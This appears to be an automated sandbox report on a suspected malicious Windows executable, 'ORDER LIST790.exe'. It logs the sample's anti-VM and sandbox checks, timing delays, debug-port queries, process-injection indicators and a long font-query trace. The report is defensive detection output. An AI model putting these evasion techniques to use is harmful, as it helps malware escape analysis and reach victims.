Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ORDER LIST790.exe PID: 980, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\ORDER LIST790.exe TID: 5492	Thread sleep time: -45877s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe TID: 5512	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe TID: 3744	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\ORDER LIST790.exe	Thread delayed: delay time: 45877	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Memory written: C:\Users\user\Desktop\ORDER LIST790.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Process created: C:\Users\user\Desktop\ORDER LIST790.exe C:\Users\user\Desktop\ORDER LIST790.exe

Jump to behavior

Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Users\user\Desktop\ORDER LIST790.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
